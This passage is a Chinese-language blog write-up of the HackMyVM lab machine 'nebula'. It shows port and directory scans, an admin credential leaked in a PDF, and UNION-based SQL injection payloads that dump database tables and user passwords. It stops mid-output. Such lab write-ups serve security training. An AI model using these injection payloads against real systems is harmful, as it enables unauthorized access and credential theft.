{"id":419,"date":"2024-03-19T01:50:31","date_gmt":"2024-03-18T17:50:31","guid":{"rendered":"http:\/\/162.14.82.114\/?p=419"},"modified":"2024-03-19T01:50:31","modified_gmt":"2024-03-18T17:50:31","slug":"hmv-_-nebula","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/419\/03\/19\/2024\/","title":{"rendered":"hmv[-_-]nebula"},"content":{"rendered":"<h1>nebula<\/h1>\n<p>\u6253\u4e0d\u5f00\uff0c\u6b63\u5e38\u7684\uff0c\u5148\u5bfc\u5165<code>virtualbox<\/code>\u518d\u8f6c\u62101.0\u683c\u5f0f\u7684\u5bfc\u51fa\u6765\uff0c\u6700\u540e\u4e22\u8fdb<code>vmware<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148116.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148116.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318193904545\"  \/><\/div><\/p>\n<p>\u5b8c\u86cb\uff0c\u53c8\u548c<code>quick<\/code>\u4e00\u4e2a\u5fb7\u884c\uff0c\u626b\u4e00\u4e0b\uff0c\u679c\u7136\u626b\u4e0d\u5230\uff0c\u66f4\u6539\u4e00\u4e0b\u517c\u5bb9\u6027\uff0c\u6539\u4e3anat\u6a21\u5f0f\uff0c\u518d\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148118.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148118.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318194137633\"  \/><\/div><\/p>\n<p>\u770b\u4e0a\u53bb\u7a0d\u5fae\u9760\u8c31\u4e86\u4e00\u70b9\u70b9\uff0c\u4e0d\u77e5\u9053\u662f\u56e0\u4e3a\u517c\u5bb9\u6027\u8fd8\u662fnat\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318194226343\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u5230\uff0c\u725b\u903c\uff0c\u8bf4\u4e86<code>vmware<\/code>\u53ef\u4ee5\u517c\u5bb9\u7684\uff0c\u7ed3\u679c\u7ed9\u6211\u6765\u865a\u7684\uff0c\u800c\u4e14<code>ubuntu20.04<\/code>\u9ed8\u8ba4\u8fd8\u4e0d\u5e26grub\uff0c\u6de6\u3002\u8bd5\u4e00\u4e0b<code>vritualbox<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148120.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148120.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318195212314\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c45\u7136\u53ef\u4ee5\uff0c\u6211\u771f\u7684\u8981\u5410\u8840\u4e86\uff0c\u884c\u5427\uff0c\u5148\u8fd9\u4e48\u505a\u5427\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sV -sT -T4 -p- 10.0.2.5 <\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318195622871\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">dirb 
10.0.2.5<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ dirb  http:\/\/10.0.2.5\/\n-----------------\nDIRB v2.22    \nBy The Dark Raver\n-----------------\nSTART_TIME: Mon Mar 18 07:57:54 2024\nURL_BASE: http:\/\/10.0.2.5\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n-----------------\nGENERATED WORDS: 4612                                                          \n---- Scanning URL: http:\/\/10.0.2.5\/ ----\n==&gt; DIRECTORY: http:\/\/10.0.2.5\/img\/                                                                                   \n+ http:\/\/10.0.2.5\/index.php (CODE:200|SIZE:3479)                                                                      \n==&gt; DIRECTORY: http:\/\/10.0.2.5\/login\/                                                                                 \n+ http:\/\/10.0.2.5\/server-status (CODE:403|SIZE:273)\n---- Entering directory: http:\/\/10.0.2.5\/img\/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
\n    (Use mode &#039;-w&#039; if you want to scan it anyway)\n---- Entering directory: http:\/\/10.0.2.5\/login\/ ----\n+ http:\/\/10.0.2.5\/login\/index.php (CODE:200|SIZE:1551)                                                                \n-----------------\nEND_TIME: Mon Mar 18 07:57:57 2024\nDOWNLOADED: 9224 - FOUND: 3<\/code><\/pre>\n<p>\u770b\u6765\u6240\u89c1\u5373\u6240\u5f97\u4e86\u3002<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u76f4\u63a5ssh\u80af\u5b9a\u662f\u4e0d\u884c\u7684\u4e86\uff0c\u5c1d\u8bd5\u627e\u4e00\u4e0b\u6709\u65e0\u5176\u4ed6\u7684\u529e\u6cd5\uff0c\u53ef\u4ee5\u770b\u5230\u6709\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u8fdb\u53bb\u7785\u7785\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318200105679\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8001\u6837\u5b50\uff0c\u5f31\u5bc6\u7801\u548c\u4e07\u80fd\u5bc6\u7801\uff0c\u8fdb\u4e0d\u53bb\uff0cxieng\uff01<\/p>\n<p>\u53ef\u80fd\u6709\u76ee\u5f55\u6ca1\u626b\u5230\uff0c\u91cd\u65b0 fuzz \u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/10.0.2.5\/FUZZ -w 
\/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories-lowercase.txt<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u5728<code>virtualbox<\/code>\u7684kali\u5c45\u7136\u6ca1\u6709\u8fd9\u4e2a\u5e93\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ls -lh \/usr\/share\/seclists\/\nls: cannot access &#039;\/usr\/share\/seclists\/&#039;: No such file or directory<\/code><\/pre>\n<p>\u73b0\u4f20\u4e00\u4e2a\u5148\u628a\u641e\u4e86\u5427\uff0c\u8fd8\u4e0d\u4e00\u5b9a\u80fd\u7528\u4e0a\u5462\uff0c\u6574\u4e2a<code>seclist<\/code>1\u4e2a\u591aG\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/10.0.2.5\/FUZZ -w raft-medium-directories-lowercase.txt<\/code><\/pre>\n<p>\u6c14\u6655\u4e86  -_-``` ~~<\/p>\n<pre><code class=\"language-text\">img                     [Status: 301, Size: 302, Words: 20, Lines: 10, Duration: 2ms]\nlogin                   [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 407ms]\nserver-status           [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 1ms]<\/code><\/pre>\n<p>\u8d8a\u626b\u8d8a\u5c11\uff0c\u884c\u884c\u884c\uff0c\u6362\u4e2a\u5927\u4e00\u70b9\u7684\u5b57\u5178\uff1a<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/10.0.2.5\/FUZZ -w directory-list-lowercase-2.3-medium.txt<\/code><\/pre>\n<p>\u518d\u626b\u4e0d\u51fa\u6765\u5c31\u4e0d\u627e\u8fd9\u4e2a\u4e86\uff0c\u53ef\u80fd\u4e0d\u662f\u654f\u611f\u76ee\u5f55\u5165\u624b\u7684\u3002<\/p>\n<pre><code class=\"language-text\">img                     [Status: 301, Size: 302, Words: 20, Lines: 10, Duration: 410ms]\njoinus                  [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 1ms]\n                        [Status: 200, Size: 3479, Words: 669, Lines: 77, Duration: 3ms]\nserver-status           [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 2ms]<\/code><\/pre>\n<p>\u6b38\u563f\uff0c\u771f\u626b\u51fa\u6765\u4e86\uff0c\u770b\u770b\u6709\u54ea\u4e9b\u4e1c\u897f\uff1a<\/p>\n<p><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202633200\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148124.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148124.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202647113\" \/><\/div><\/p>\n<p>\u96be\u9053\u662f\u9690\u6c34\u5370\uff1f\u7b49\u4e0b\u505a\u4e0d\u51fa\u6765\u53ef\u4ee5\u8bd5\u8bd5\uff0c<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148125.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202823442\" \/><\/div><\/p>\n<p>\u6253\u5f00\u53d1\u73b0\u6709\u4e00\u4e2apdf\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148126.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318202845110\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6c57\u6d41\u6d43\u80cc\u4e86\uff0c\u8981\u662f\u6ca1\u7ee7\u7eed\u641c\u96c6\u5c31\u5bc4\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-apl\">admin\nd46df8e6a5627debf930f7b5c8f3b083<\/code><\/pre>\n<p>\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148127.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318203429049\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148128.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318203450864\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148129.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148129.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318212501848\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u662f\u524d\u9762\u90a3\u4e2a\uff0c\u53c8\u662f\u4e2a\u67e5\u8be2\u4fe1\u606f\u7684\u5730\u65b9\uff0c\u731c\u6d4b\u53c8\u662fsql\u6ce8\u5165\u6f0f\u6d1e\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148130.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148130.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213009846\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u679c\u7136\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">ctf&#039; union select schema_name,2,3 from information_schema.schemata-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148131.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148131.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213135764\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">ctf&#039; union select table_name,2,3 from information_schema.tables where table_schema=&quot;nebuladb&quot;-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148132.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148132.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213238316\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">&#039; union select column_name,2,3 from information_schema.columns where table_schema=&quot;nebuladb&quot; and table_name=&quot;users&quot;-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148133.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148133.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213422011\" \/><\/div><\/p>\n<pre><code>&#039; union select concat(username, password),2,3 from nebuladb.users-- -\n&#039; union select username, password,3 from nebuladb.users-- -<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148134.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148134.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213740351\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148135.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403190148135.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240318213817585\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">admin                   
